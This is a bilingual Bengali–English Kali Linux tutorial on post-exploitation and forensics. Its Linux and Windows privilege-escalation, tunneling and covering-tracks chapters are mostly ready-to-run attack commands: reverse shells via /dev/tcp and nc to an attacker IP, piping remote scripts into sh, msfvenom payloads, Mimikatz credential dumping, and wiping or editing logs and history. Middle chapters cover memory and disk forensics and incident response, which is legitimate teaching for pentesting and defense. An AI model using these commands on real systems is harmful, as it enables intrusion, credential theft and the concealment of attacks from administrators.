Kali Linux Series — Part 5: Post-Exploitation & Forensics

CHAPTER 01

🐧 LinPEAS & WinPEAS — Automated PrivEsc EnumerationAutomated PrivEsc Enumeration

Target system-এ privilege escalation-এর সব vector automatically খুঁজে বের করোAutomatically find all privilege escalation vectors on target system

🐛

linpeas.sh / winpeas.exe

PEASS-ng suite — Linux ও Windows-এ PrivEsc vector automatically scan করে color-coded output দেয়PEASS-ng suite — automatically scans Linux and Windows for PrivEsc vectors with color-coded output

PrivEsc Scan Enumeration

🐧 LinPEAS — Target-এ Deliver ও Run করোDeliver & Run on Target

═══ Method 1: Attacker থেকে HTTP server দিয়ে transfer করো ═══ # Attacker machine-এ (linpeas.sh আছে সেই folder-এ): root@kali:~# python3 -m http.server 8080 # Target machine-এ download করো ও চালাও: target$ wget http://192.168.1.100:8080/linpeas.sh -O /tmp/linpeas.sh target$ chmod +x /tmp/linpeas.sh && /tmp/linpeas.sh ═══ Method 2: Curl দিয়ে সরাসরি run করো (disk-এ save ছাড়া) ═══ target$ curl 192.168.1.100:8080/linpeas.sh | sh ═══ Method 3: GitHub থেকে সরাসরি ═══ target$ curl -L https://github.com/peass-ng/PEASS-ng/releases/latest/download/linpeas.sh | sh ═══ Output file-এ save করো (পরে analyze করার জন্য) ═══ target$ ./linpeas.sh | tee /tmp/linpeas_output.txt ═══ Attacker-এ output পাঠাও (nc দিয়ে) ═══ # Attacker-এ: root@kali:~# nc -lvnp 9001 | tee linpeas_result.txt # Target-এ: target$ ./linpeas.sh | nc 192.168.1.100 9001

⚙️ LinPEAS — Flags ও OptionsFlags & Options

Flag	কাজFunction
-a	সব checks চালাও (slow কিন্তু thorough)Run all checks (slow but thorough)
-s	Super fast mode (কম check)Super fast mode (fewer checks)
-o section	শুধু নির্দিষ্ট section চালাও (SysI, UsrI, SofI, NetI, FilI, ProI)Run only specific section
-d	Extra checks — directory permissions ইত্যাদিExtra checks — directory permissions etc.
-D	Debug modeDebug mode
-P password	Current user password দাও (sudo check-এর জন্য)Provide current user password (for sudo checks)
-q	Quiet mode — কম noiseQuiet mode — less noise

🏷️ LinPEAS Output Color CodeLinPEAS Output Color Codes

🔴 Red/Yellow — Critical!

Highly probable PE vector — সবার আগে এগুলো দেখো। SUID files, writable paths, sudo misconfigs।Highly probable PE vector — look at these first. SUID files, writable paths, sudo misconfigs.

🟡 Yellow — Interesting

Interesting information — manually check করো। Config files, cron jobs, network info।Interesting info — check manually. Config files, cron jobs, network info.

🔵 Blue — Info

General system info — reference হিসেবে রাখো।General system info — keep for reference.

⚪ White — Normal

Normal/expected output — সাধারণত ignore করো।Normal/expected output — generally ignore.

🪟 WinPEAS — Windows PrivEsc EnumerationWindows PrivEsc Enumeration

# Target Windows-এ transfer করো (SMB দিয়ে) root@kali:~# impacket-smbserver share /opt/tools -smb2support # Windows target-এ: C:\> copy \\192.168.1.100\share\winpeas.exe C:\Windows\Temp\ C:\> cd C:\Windows\Temp && winpeas.exe # PowerShell দিয়ে download করো PS C:\> IEX(New-Object Net.WebClient).DownloadString('http://192.168.1.100:8080/winpeasany.exe') # নির্দিষ্ট category চালাও C:\> winpeas.exe systeminfo C:\> winpeas.exe userinfo C:\> winpeas.exe servicesinfo C:\> winpeas.exe applicationsinfo C:\> winpeas.exe networkinfo C:\> winpeas.exe windowscreds # Output file-এ save করো C:\> winpeas.exe > C:\Windows\Temp\winpeas_out.txt 2>&1 # Quiet mode C:\> winpeas.exe quiet

CHAPTER 02

⬆️ Linux Privilege Escalation — Manual TechniquesManual Techniques

SUID, Sudo, Cron, PATH, Kernel — Linux-এ root পাওয়ার সব পদ্ধতিSUID, Sudo, Cron, PATH, Kernel — all methods to gain root on Linux

🔍 Initial Enumeration — প্রথমে কী দেখবInitial Enumeration — What to Check First

# Basic system info target$ id && whoami # বর্তমান user target$ uname -a # Kernel version target$ cat /etc/os-release # OS version target$ cat /etc/passwd # সব users target$ cat /etc/shadow # Password hashes (root দরকার) target$ sudo -l # Sudo permissions দেখো target$ env # Environment variables target$ history # Command history target$ ls -la /home/ # Other users' home target$ cat /etc/crontab # Cron jobs target$ ls -la /etc/cron* # All cron files target$ ps aux # Running processes target$ netstat -tulnp 2>/dev/null || ss -tulnp # Open ports

🔑 SUID/SGID — Exploit করোExploit

💡 SUID কী?

SUID (Set User ID) bit set থাকা file execute হলে file owner-এর permission-এ চলে। যদি root-owned SUID file থাকে এবং সেটা exploitable হয়, তাহলে root shell পাওয়া সম্ভব। Files with SUID bit run with the permissions of the file owner. If a root-owned SUID file is exploitable, you can get a root shell.

# SUID files খোঁজো target$ find / -perm -4000 -type f 2>/dev/null target$ find / -perm -u=s -type f 2>/dev/null # SGID files খোঁজো target$ find / -perm -2000 -type f 2>/dev/null # SUID+SGID দুটো একসাথে target$ find / -perm -6000 -type f 2>/dev/null # GTFOBins দিয়ে exploit করো — উদাহরণ: /usr/bin/find SUID থাকলে target$ find . -exec /bin/sh -p \; -quit # /usr/bin/vim SUID থাকলে target$ vim -c ':py3 import os; os.execl("/bin/sh", "sh", "-pc", "reset; exec sh -p")' # /usr/bin/python3 SUID থাকলে target$ python3 -c 'import os; os.execl("/bin/sh", "sh", "-p")' # /usr/bin/cp SUID থাকলে — /etc/passwd copy করো target$ openssl passwd -1 -salt hack hackedpass target$ echo 'hacker:$1$hack$hash:0:0:root:/root:/bin/bash' >> /tmp/passwd target$ cp /tmp/passwd /etc/passwd target$ su hacker

🔐 Sudo Misconfiguration

# Sudo permissions দেখো target$ sudo -l # উদাহরণ output: (ALL) NOPASSWD: /usr/bin/vim # এর মানে password ছাড়াই vim root হিসেবে চালানো যাবে # sudo vim দিয়ে root shell: target$ sudo vim -c ':!/bin/bash' # sudo python দিয়ে root shell: target$ sudo python3 -c 'import pty; pty.spawn("/bin/bash")' # sudo awk দিয়ে: target$ sudo awk 'BEGIN {system("/bin/bash")}' # sudo find দিয়ে: target$ sudo find /etc -exec /bin/bash \; # sudo nmap দিয়ে (old version): target$ echo "os.execute('/bin/sh')" > /tmp/shell.nse && sudo nmap --script=/tmp/shell.nse # sudo less / man / more দিয়ে — !/bin/bash চালাও: target$ sudo less /etc/passwd # তারপর: !/bin/bash # sudo env দিয়ে: target$ sudo env /bin/bash # (ALL) NOPASSWD: ALL থাকলে সরাসরি: target$ sudo su target$ sudo /bin/bash

⏰ Cron Job Hijacking

# Cron jobs খোঁজো target$ cat /etc/crontab target$ ls -la /etc/cron.d/ /etc/cron.daily/ /etc/cron.hourly/ target$ cat /var/spool/cron/crontabs/* target$ crontab -l # Writable script আছে কিনা দেখো # উদাহরণ: /etc/crontab-এ: * * * * * root /opt/scripts/backup.sh target$ ls -la /opt/scripts/backup.sh # -rw-rw-rw- মানে সবাই write করতে পারে # Script-এ reverse shell inject করো target$ echo "bash -i >& /dev/tcp/192.168.1.100/4444 0>&1" >> /opt/scripts/backup.sh # Attacker-এ listener চালাও root@kali:~# nc -lvnp 4444 # Cron job চালানোর সময় root shell পাবে # Script না থাকলে তৈরি করো target$ echo '#!/bin/bash' > /opt/scripts/backup.sh target$ echo 'bash -i >& /dev/tcp/192.168.1.100/4444 0>&1' >> /opt/scripts/backup.sh target$ chmod +x /opt/scripts/backup.sh

🛤️ PATH Injection

# একটি SUID script বা cron job নির্দিষ্ট command চালাচ্ছে কিনা দেখো # যেমন: script.sh-এ "service apache2 restart" লেখা আছে (full path ছাড়া) # Writable directory PATH-এ add করো target$ export PATH=/tmp:$PATH # Fake "service" command তৈরি করো /tmp-এ target$ echo '#!/bin/bash' > /tmp/service target$ echo '/bin/bash -p' >> /tmp/service target$ chmod +x /tmp/service # এখন সেই SUID script চালাও → root shell পাবে target$ ./vulnerable_suid_script

🐛 Kernel Exploit

# Kernel version দেখো target$ uname -r target$ cat /proc/version # Searchsploit দিয়ে kernel exploit খোঁজো root@kali:~# searchsploit linux kernel 4.15 privilege escalation # Popular kernel exploits: # DirtyCow (CVE-2016-5195) — kernel 2.6.22 to 4.8.3 target$ wget http://192.168.1.100:8080/dirtycow.c -O /tmp/cow.c target$ gcc -pthread /tmp/cow.c -o /tmp/dirtycow -lcrypt && /tmp/dirtycow # DirtyPipe (CVE-2022-0847) — kernel 5.8 to 5.16.11 target$ ./dirtypipe /etc/passwd # Linux Local Privilege Escalation Suggester target$ wget http://192.168.1.100:8080/linux-exploit-suggester.sh target$ chmod +x linux-exploit-suggester.sh && ./linux-exploit-suggester.sh

📁 অন্যান্য PrivEsc VectorsOther PrivEsc Vectors

# World-writable ও sensitive files খোঁজো target$ find / -writable -type f 2>/dev/null | grep -v proc target$ find / -writable -type d 2>/dev/null | grep -v proc # Weak file permissions target$ ls -la /etc/passwd /etc/shadow /etc/sudoers target$ ls -la /root/ # Interesting files target$ find / -name "*.conf" -readable 2>/dev/null | head -20 target$ find / -name "id_rsa" -o -name "id_dsa" 2>/dev/null target$ find / -name "*.bak" -o -name "*.backup" 2>/dev/null target$ grep -r "password" /etc/ 2>/dev/null target$ grep -r "password" /var/www/ 2>/dev/null # NFS shares (no_root_squash) target$ cat /etc/exports root@kali:~# showmount -e target_ip root@kali:~# mount -o rw,vers=2 target_ip:/share /mnt/nfs # Docker group সদস্য কিনা দেখো target$ id | grep docker target$ docker run -v /:/mnt --rm -it alpine chroot /mnt sh # Capabilities check target$ getcap -r / 2>/dev/null # python3 cap_setuid+ep থাকলে: target$ python3 -c 'import os; os.setuid(0); os.system("/bin/bash")'

CHAPTER 03

🪟 Windows Privilege Escalation

Token impersonation, Service misconfiguration, Registry — Windows-এ SYSTEM পাওয়ার পদ্ধতিToken impersonation, service misconfiguration, registry — methods to get SYSTEM on Windows

🔍 Initial EnumerationInitial Enumeration

# System info C:\> systeminfo # OS, hotfixes, architecture C:\> whoami /all # Current user + groups + privileges C:\> net user # All local users C:\> net localgroup administrators # Admin group members C:\> net user [username] # Specific user details C:\> ipconfig /all # Network info C:\> netstat -ano # Open connections C:\> tasklist /SVC # Running processes + services C:\> schtasks /query /fo LIST /v # Scheduled tasks C:\> wmic service get name,displayname,startname,startmode # Services

🎭 Token Impersonation — Juicy Potato / PrintSpoofer

💡 SeImpersonatePrivilege

whoami /priv-এ SeImpersonatePrivilege বা SeAssignPrimaryTokenPrivilege থাকলে Juicy Potato / PrintSpoofer / RoguePotato দিয়ে SYSTEM হওয়া সম্ভব। If SeImpersonatePrivilege or SeAssignPrimaryTokenPrivilege appears in whoami /priv, you can get SYSTEM with Juicy Potato / PrintSpoofer / RoguePotato.

# Privilege check করো C:\> whoami /priv # PrintSpoofer (Windows 10, Server 2016/2019) C:\> PrintSpoofer.exe -i -c cmd C:\> PrintSpoofer.exe -c "nc.exe 192.168.1.100 4444 -e cmd" # JuicyPotato (Windows < 2019) C:\> JuicyPotato.exe -l 1337 -p cmd.exe -a "/c whoami" -t * C:\> JuicyPotato.exe -l 1337 -p cmd.exe -a "/c nc.exe 192.168.1.100 4444 -e cmd" -t * # GodPotato (all Windows versions) C:\> GodPotato.exe -cmd "cmd /c whoami" C:\> GodPotato.exe -cmd "nc.exe 192.168.1.100 4444 -e cmd"

⚙️ Service Misconfiguration

# Unquoted service path খোঁজো C:\> wmic service get name,displayname,pathname,startmode | findstr /i "auto" | findstr /i /v "c:\windows" # Service permissions check করো C:\> accesschk.exe -wuvc "Everyone" * /accepteula C:\> accesschk.exe -wuvc "BUILTIN\Users" * /accepteula # Vulnerable service path # উদাহরণ: C:\Program Files\Vulnerable Service\service.exe # C:\Program.exe তৈরি করলে সেটা চলবে (unquoted) C:\> msfvenom -p windows/x64/shell_reverse_tcp LHOST=192.168.1.100 LPORT=4444 -f exe -o Program.exe C:\> copy Program.exe "C:\Program.exe" C:\> net stop [service] && net start [service] # Weak service permission C:\> sc config [service] binpath= "C:\Windows\Temp\payload.exe" C:\> net stop [service] && net start [service]

📋 Registry PrivEsc

# AlwaysInstallElevated check করো C:\> reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated C:\> reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated # দুটোই 0x1 হলে → MSI payload বানাও: root@kali:~# msfvenom -p windows/x64/shell_reverse_tcp LHOST=192.168.1.100 LPORT=4444 -f msi -o payload.msi C:\> msiexec /quiet /qn /i C:\Windows\Temp\payload.msi # Autologon credentials খোঁজো C:\> reg query "HKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon" # Saved credentials C:\> cmdkey /list C:\> runas /savecred /user:admin "cmd.exe /c whoami"

🔑 Pass-the-Hash / Credential Dumping

# Meterpreter দিয়ে hashdump (SYSTEM দরকার) meterpreter> hashdump # Mimikatz — SYSTEM হলে সব credentials পাবে meterpreter> load kiwi meterpreter> creds_all meterpreter> lsa_dump_sam meterpreter> lsa_dump_secrets # Mimikatz direct (cmd.exe as SYSTEM) C:\> mimikatz.exe "privilege::debug" "sekurlsa::logonpasswords" "exit" C:\> mimikatz.exe "privilege::debug" "lsadump::sam" "exit" # CrackMapExec দিয়ে Pass-the-Hash root@kali:~# cme smb 192.168.1.5 -u administrator -H 'NTLM_HASH'

CHAPTER 04

🚇 Netcat, Socat & Chisel — Tunneling & PivotingTunneling & Pivoting

Firewall bypass, port forwarding, SOCKS proxy দিয়ে internal network-এ পৌঁছাওBypass firewalls, port forwarding, SOCKS proxy to reach internal networks

📡 Netcat — সম্পূর্ণ CommandsComplete Commands

কমান্ডCommand	কাজFunction
nc -lvnp 4444	TCP listener চালাও (-l=listen, -v=verbose, -n=no dns, -p=port)Start TCP listener
nc 192.168.1.5 4444	TCP connection করোConnect via TCP
nc -lvnp 4444 -e /bin/bash	Bind shell — port খুলে bash দাওBind shell — open port and serve bash
nc host port -e /bin/bash	Reverse shell পাঠাওSend reverse shell
nc -lvnp 4444 > file.txt	Incoming data file-এ save করোSave incoming data to file
nc host port < file.txt	File পাঠাওSend file
nc -zv host 1-1000	Port scan করোPort scan
nc -u host 53	UDP connection করোUDP connection
nc -w 5 host port	5 second timeout সেট করোSet 5 second timeout
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f\|/bin/sh -i 2>&1\|nc host port >/tmp/f	Named pipe দিয়ে reverse shell (OpenBSD nc)Reverse shell via named pipe (OpenBSD nc)

🔄 Socat — Advanced Networking ToolAdvanced Networking Tool

# TTY reverse shell listener (সবচেয়ে ভালো shell পাবে) root@kali:~# socat file:`tty`,raw,echo=0 TCP-LISTEN:4444 # Target-এ fully interactive shell পাঠাও target$ socat TCP:192.168.1.100:4444 EXEC:'bash -li',pty,stderr,setsid,sigint,sane # Simple bind shell target$ socat TCP-LISTEN:4444,reuseaddr,fork EXEC:/bin/bash,pty,stderr root@kali:~# socat - TCP:target:4444 # Port forwarding — local 8080 → remote 80 target$ socat TCP-LISTEN:8080,reuseaddr,fork TCP:192.168.1.200:80 # SSL encrypted reverse shell root@kali:~# openssl req -newkey rsa:2048 -nodes -keyout shell.key -x509 -days 362 -out shell.crt root@kali:~# cat shell.key shell.crt > shell.pem root@kali:~# socat OPENSSL-LISTEN:4444,cert=shell.pem,verify=0 FILE:`tty`,raw,echo=0 target$ socat OPENSSL:192.168.1.100:4444,verify=0 EXEC:/bin/bash,pty,stderr,setsid

🚇 Chisel — HTTP-based TunnelingHTTP-based Tunneling

💡 Chisel কী?

Chisel HTTP দিয়ে TCP tunnel করে — Firewall যদি শুধু HTTP allow করে তখনো কাজ করে। Internal network-এ পৌঁছানোর জন্য ideal। Chisel tunnels TCP over HTTP — works even if only HTTP is allowed. Ideal for reaching internal networks through firewalls.

═══ Remote Port Forward — Target-এর service attacker-এ access করো ═══ # Attacker-এ server চালাও: root@kali:~# chisel server -p 8080 --reverse # Target-এ client চালাও (internal 80 port forward করো): target$ chisel client 192.168.1.100:8080 R:9090:127.0.0.1:80 # এখন attacker-এ localhost:9090 দিয়ে target-এর port 80 access করো ═══ SOCKS5 Proxy (সব internal network access করো) ═══ # Attacker-এ: root@kali:~# chisel server -p 8080 --reverse # Target-এ: target$ chisel client 192.168.1.100:8080 R:socks # Attacker-এ proxychains configure করো: root@kali:~# echo "socks5 127.0.0.1 1080" >> /etc/proxychains4.conf # এখন proxychains দিয়ে internal network access করো: root@kali:~# proxychains nmap -sT -p 80,443,22 192.168.2.5 root@kali:~# proxychains curl http://192.168.2.5 root@kali:~# proxychains ssh user@192.168.2.5 ═══ Local Port Forward — Attacker-এর service target-এ forward করো ═══ target$ chisel client 192.168.1.100:8080 3000:localhost:3000

🔀 SSH Tunneling / Port Forwarding

# Local Port Forward — localhost:8080 → target:80 root@kali:~# ssh -L 8080:127.0.0.1:80 user@target -N # Remote Port Forward — target-এর 4444 → attacker:4444 root@kali:~# ssh -R 4444:127.0.0.1:4444 user@target -N # Dynamic Port Forward — SOCKS proxy (internal network) root@kali:~# ssh -D 1080 user@target -N # proxychains দিয়ে use করো # Double pivot — target → internal → deep internal root@kali:~# ssh -L 8888:192.168.2.5:22 user@192.168.1.5 -N root@kali:~# ssh -p 8888 user@127.0.0.1

CHAPTER 05

🧠 Volatility — Memory ForensicsMemory Forensics

RAM dump থেকে process, network, malware, credentials — সব বের করোExtract processes, network connections, malware, and credentials from RAM dumps

🧠

volatility3 / vol.py

Open-source memory forensics framework — Windows, Linux, macOS memory dump analyze করতে পারেOpen-source memory forensics framework — analyzes Windows, Linux, macOS memory dumps

Memory Analysis Forensics

🚀 Volatility 3 — Basic Setup ও SyntaxVolatility 3 — Basic Setup & Syntax

# Install করো (যদি না থাকে) root@kali:~# pip3 install volatility3 root@kali:~# git clone https://github.com/volatilityfoundation/volatility3.git root@kali:~# cd volatility3 && python3 setup.py install # Basic syntax (Volatility 3): # vol -f [memory_dump] [plugin] root@kali:~# vol -f memory.dmp windows.info # Volatility 2 syntax (অনেক CTF-এ এখনো use হয়): # volatility -f [dump] --profile=[profile] [plugin] root@kali:~# volatility -f memory.dmp --profile=Win10x64_19041 pslist # Profile identify করো (Volatility 2) root@kali:~# volatility -f memory.dmp imageinfo root@kali:~# volatility -f memory.dmp kdbgscan

💻 Process AnalysisProcess Analysis

Plugin (Vol3)	Plugin (Vol2)	কাজFunction
windows.pslist	pslist	Running processes দেখাও (EPROCESS list থেকে)Show running processes (from EPROCESS list)
windows.pstree	pstree	Process tree দেখাও (parent-child relationship)Show process tree (parent-child)
windows.psscan	psscan	Pool scanning — hidden process খোঁজোPool scanning — find hidden processes
windows.dlllist	dlllist	Process-এর loaded DLL দেখাওShow loaded DLLs for a process
windows.cmdline	cmdline	প্রতিটি process-এর command line arguments দেখাওShow command line args for each process
windows.handles	handles	Open handles দেখাওShow open handles
windows.malfind	malfind	Injected code/malware খোঁজো (suspicious memory)Find injected code/malware (suspicious memory)
windows.memmap	memmap	Process memory map দেখাওShow process memory map
windows.procdump	procdump	Process executable disk-এ dump করোDump process executable to disk
windows.memdump	memdump	Process memory সম্পূর্ণ dump করোDump entire process memory

🌐 Network AnalysisNetwork Analysis

Plugin (Vol3)	Plugin (Vol2)	কাজFunction
windows.netstat	netscan	Network connections দেখাও (active + closed)Show network connections (active + closed)
windows.netstat	connections	Active TCP connections (WinXP/2003)Active TCP connections (WinXP/2003)
windows.netstat	connscan	Connection pool scan (terminated সহ)Connection pool scan (including terminated)

📁 File System ও RegistryFile System & Registry

Plugin (Vol3)	Plugin (Vol2)	কাজFunction
windows.filescan	filescan	Memory-তে থাকা file objects খোঁজোFind file objects in memory
windows.dumpfiles	dumpfiles	Memory থেকে file extract করোExtract files from memory
windows.registry.hivelist	hivelist	Registry hives দেখাওList registry hives
windows.registry.printkey	printkey	Registry key value দেখাওShow registry key value
windows.registry.userassist	userassist	Recently accessed programs দেখাওShow recently accessed programs

🔑 Credentials ExtractionCredentials Extraction

Plugin (Vol3)	Plugin (Vol2)	কাজFunction
windows.hashdump	hashdump	SAM database থেকে password hash dump করোDump password hashes from SAM database
windows.lsadump	lsadump	LSA secrets dump করোDump LSA secrets
windows.cachedump	cachedump	Cached domain credentials dump করোDump cached domain credentials
windows.clipboard	clipboard	Clipboard data দেখাওShow clipboard data

# Volatility 3 — সম্পূর্ণ workflow root@kali:~# vol -f memory.dmp windows.info # OS info root@kali:~# vol -f memory.dmp windows.pslist # Process list root@kali:~# vol -f memory.dmp windows.pstree # Process tree root@kali:~# vol -f memory.dmp windows.psscan # Hidden processes root@kali:~# vol -f memory.dmp windows.netstat # Network connections root@kali:~# vol -f memory.dmp windows.cmdline # Command line args root@kali:~# vol -f memory.dmp windows.malfind # Injected code root@kali:~# vol -f memory.dmp windows.hashdump # Password hashes root@kali:~# vol -f memory.dmp windows.filescan | grep -i "\.txt\|\.docx\|\.pdf" # Specific PID-এর process dump করো root@kali:~# vol -f memory.dmp windows.procdump --pid 1234 --dump-dir /tmp/dumps/ # File extract করো (offset দিয়ে) root@kali:~# vol -f memory.dmp windows.dumpfiles --virtaddr 0xc000012345 # Strings extract করো (মাঝে মাঝে password পাওয়া যায়) root@kali:~# strings memory.dmp | grep -i "password\|passwd\|credential"

CHAPTER 06

💽 Autopsy & Sleuth Kit — Disk ForensicsDisk Forensics

Disk image analysis, deleted file recovery, file timeline — digital evidence collect করোDisk image analysis, deleted file recovery, file timeline — collect digital evidence

💽 Disk Image তৈরি করোCreate Disk Image

# dd দিয়ে disk image তৈরি করো root@kali:~# dd if=/dev/sdb of=/evidence/disk.img bs=4M status=progress # dcfldd (dd + hash verification) root@kali:~# dcfldd if=/dev/sdb of=/evidence/disk.img hash=md5 md5log=/evidence/hash.txt # Image verify করো (MD5) root@kali:~# md5sum /evidence/disk.img # Image mount করো (read-only) root@kali:~# mount -o ro,loop /evidence/disk.img /mnt/evidence # Specific partition mount করো root@kali:~# fdisk -l disk.img # Partition offset দেখো root@kali:~# mount -o ro,loop,offset=$((512*2048)) disk.img /mnt/part1

🔍 The Sleuth Kit (TSK) — CLI ForensicsCLI Forensics

কমান্ডCommand	কাজFunction
mmls disk.img	Partition table দেখাওShow partition table
fsstat -o 2048 disk.img	File system info দেখাওShow file system info
fls -r -o 2048 disk.img	সব files ও directories list করো (deleted সহ)List all files and dirs (including deleted)
fls -r -d -o 2048 disk.img	শুধু deleted files দেখাওShow only deleted files
icat -o 2048 disk.img [inode]	Inode দিয়ে file content দেখাও / recover করোView/recover file by inode
ils -o 2048 disk.img	Inode information দেখাওShow inode information
tsk_recover disk.img /output/	Recoverable files extract করোExtract recoverable files
tsk_gettimes -o 2048 disk.img > timeline.txt	File timeline তৈরি করোCreate file timeline
mactime -b timeline.txt -d > readable.csv	Human-readable timeline তৈরি করোCreate human-readable timeline

🖥️ Autopsy — GUI Forensics PlatformGUI Forensics Platform

# Autopsy চালু করো root@kali:~# autopsy # Browser-এ যাও: http://localhost:9999/autopsy # CLI mode-এ case তৈরি করো root@kali:~# autopsy -c /evidence/case/

Autopsy Feature	কাজFunction
Add Data Source	Disk image, folder, বা VM import করোImport disk image, folder, or VM
File Analysis	File system browse, hex view, metadata দেখোBrowse file system, hex view, view metadata
Keyword Search	Text string, regex দিয়ে সব file search করোSearch all files by text string or regex
Deleted Files	Deleted file recover করোRecover deleted files
Timeline Analysis	File activity timeline দেখোView file activity timeline
Hash Sets	Known malware hash দিয়ে file match করোMatch files against known malware hashes
Web Artifacts	Browser history, cookies, downloads দেখোView browser history, cookies, downloads
Email Analysis	Email files parse করোParse email files
Report Generation	HTML/PDF report তৈরি করোGenerate HTML/PDF report

🔧 অন্যান্য Forensics ToolsOther Forensics Tools

# Foremost — file carving (deleted file recovery) root@kali:~# foremost -i disk.img -o /output/ -t jpg,pdf,doc,zip # Scalpel — advanced file carving root@kali:~# scalpel disk.img -o /output/ # Binwalk — firmware/binary analysis root@kali:~# binwalk firmware.bin # Analyze root@kali:~# binwalk -e firmware.bin # Extract root@kali:~# binwalk -dd '.*' firmware.bin # Extract all # Exiftool — file metadata root@kali:~# exiftool image.jpg # EXIF data দেখো root@kali:~# exiftool -all= image.jpg # সব metadata মুছো root@kali:~# exiftool -r *.jpg # Recursive analyze # Strings — binary থেকে readable text root@kali:~# strings -a malware.exe | grep -i "http\|pass\|key" # File type check root@kali:~# file suspicious_file root@kali:~# xxd suspicious_file | head -5 # Magic bytes দেখো # Hash calculation root@kali:~# md5sum file && sha1sum file && sha256sum file

CHAPTER 07

📋 Log Analysis & Incident Response

Linux ও Windows logs analyze করো, compromised system চিহ্নিত করো, evidence collect করোAnalyze Linux and Windows logs, identify compromised systems, collect evidence

📄 Linux Log Files — গুরুত্বপূর্ণ LocationsLinux Log Files — Important Locations

Log File	কাজFunction	গুরুত্ব
`/var/log/auth.log`	SSH login, sudo, authentication events	Critical
`/var/log/syslog`	General system messages	High
`/var/log/kern.log`	Kernel messages	Medium
`/var/log/apache2/access.log`	Apache web access log	Critical
`/var/log/apache2/error.log`	Apache error log	High
`/var/log/nginx/access.log`	Nginx access log	Critical
`/var/log/mysql/mysql.log`	MySQL query log	High
`/var/log/cron`	Cron job execution log	High
`/var/log/btmp`	Failed login attempts (binary)	Critical
`/var/log/wtmp`	Login/logout history (binary)	High
`/var/log/lastlog`	Last login per user (binary)	Medium
`/root/.bash_history`	Root's command history	Critical

🔍 Log Analysis CommandsLog Analysis Commands

# Failed SSH login attempts দেখো root@kali:~# grep "Failed password" /var/log/auth.log | tail -50 root@kali:~# grep "Failed password" /var/log/auth.log | awk '{print $11}' | sort | uniq -c | sort -rn | head # Successful SSH login দেখো root@kali:~# grep "Accepted password\|Accepted publickey" /var/log/auth.log # Sudo usage দেখো root@kali:~# grep "sudo" /var/log/auth.log | grep -v "pam_unix" # User creation দেখো root@kali:~# grep "useradd\|adduser" /var/log/auth.log # Web attack signatures দেখো root@kali:~# grep -E "union|select|insert|drop|exec|passwd|etc" /var/log/apache2/access.log root@kali:~# grep -E "\.\.\/|etc/passwd|/bin/sh|cmd\.exe" /var/log/apache2/access.log # IP কতবার access করেছে root@kali:~# awk '{print $1}' /var/log/apache2/access.log | sort | uniq -c | sort -rn | head -20 # 404 errors দেখো (scanner চলছে কিনা) root@kali:~# grep " 404 " /var/log/apache2/access.log | awk '{print $1}' | sort | uniq -c | sort -rn # Login history (binary log) root@kali:~# last -a | head -30 # Login history root@kali:~# lastb | head -30 # Failed login root@kali:~# lastlog # Last login per user root@kali:~# who # Currently logged in root@kali:~# w # Who + what they're doing

⚙️ journalctl — Systemd Log Analysis

কমান্ডCommand	কাজFunction
journalctl	সব system logs দেখাওShow all system logs
journalctl -f	Live log follow করোFollow logs live
journalctl -u ssh	SSH service logs দেখাওShow SSH service logs
journalctl -p err	Error level logs দেখাওShow error level logs
journalctl --since "1 hour ago"	গত ১ ঘণ্টার logs দেখাওShow logs from last 1 hour
journalctl --since "2024-01-01" --until "2024-01-02"	নির্দিষ্ট সময়ের logs দেখাওShow logs for specific time range
journalctl -n 100	শেষ ১০০ লাইন দেখাওShow last 100 lines
journalctl _UID=1000	নির্দিষ্ট UID-এর logsLogs for specific UID

🚨 Compromised System ChecklistCompromised System Checklist

# === আক্রান্ত সিস্টেম identify করার checklist === # 1. Unusual processes target$ ps auxf # Suspicious processes target$ ps aux | grep -v "^root\|^www-data\|^systemd" # 2. Network connections target$ ss -tulnp # Unknown listening ports target$ ss -tp | grep ESTABLISHED # Established connections target$ netstat -ano | grep -v "127.0.0.1" # 3. Recently modified files target$ find / -mtime -1 -type f 2>/dev/null | grep -v proc target$ find /var/www /tmp /dev/shm -type f -mtime -7 2>/dev/null # 4. Suspicious files in temp locations target$ ls -la /tmp/ /var/tmp/ /dev/shm/ # 5. Crontab anomalies target$ cat /etc/crontab && ls /etc/cron* target$ for user in $(cut -f1 -d: /etc/passwd); do echo $user; crontab -u $user -l 2>/dev/null; done # 6. New user accounts target$ awk -F: '$3 >= 1000 {print}' /etc/passwd target$ grep -v "^#" /etc/sudoers # 7. SUID files (newly added) target$ find / -perm -4000 -newer /etc/passwd 2>/dev/null # 8. Webshells খোঁজো target$ find /var/www -name "*.php" -newer /var/www/index.php 2>/dev/null target$ grep -rn "system\|exec\|shell_exec\|passthru\|eval\|base64_decode" /var/www/ 2>/dev/null # 9. Rootkit check root@kali:~# rkhunter --check --skip-keypress root@kali:~# chkrootkit # 10. Open files target$ lsof -i 4 -n -P | grep LISTEN # Listening services target$ lsof +D /tmp # /tmp-এ open files

CHAPTER 08

🧹 Covering Tracks — নিজেকে মুছে ফেলোCovering Tracks — Remove Your Presence

Log clear, history delete, timestamp modify — attacker ও defender উভয়ের জানা দরকারLog clearing, history deletion, timestamp modification — both attackers and defenders must know this

⚠️ শুধু Authorized Environment-এAuthorized Environment Only

এই techniques শুধু Penetration Testing বা CTF-এর জন্য। Defender হিসেবে এগুলো জানা দরকার কারণ attacker কী করতে পারে সেটা বুঝলে তুমি আরও ভালো protect করতে পারবে। These techniques are only for Penetration Testing or CTF. Defenders need to know them to understand what attackers might do and protect systems better.

🗑️ History ও Log Clear করাClear History & Logs

# Bash history disable করো (session শুরুতে) target$ unset HISTFILE target$ export HISTSIZE=0 target$ export HISTFILESIZE=0 # History file মুছো target$ history -c && history -w target$ cat /dev/null > ~/.bash_history target$ rm -f ~/.bash_history # Current session history দেখতে না দাও target$ export HISTFILE=/dev/null # Auth log clear করো (root দরকার) target$ cat /dev/null > /var/log/auth.log target$ cat /dev/null > /var/log/syslog # Specific entry মুছো target$ sed -i '/192.168.1.100/d' /var/log/auth.log target$ sed -i '/attacker_ip/d' /var/log/apache2/access.log # lastlog, wtmp, btmp clear করো target$ cat /dev/null > /var/log/wtmp target$ cat /dev/null > /var/log/btmp # Journalctl logs clear করো target$ journalctl --rotate && journalctl --vacuum-time=1s

⏱️ File Timestamp Modify করোModify File Timestamps

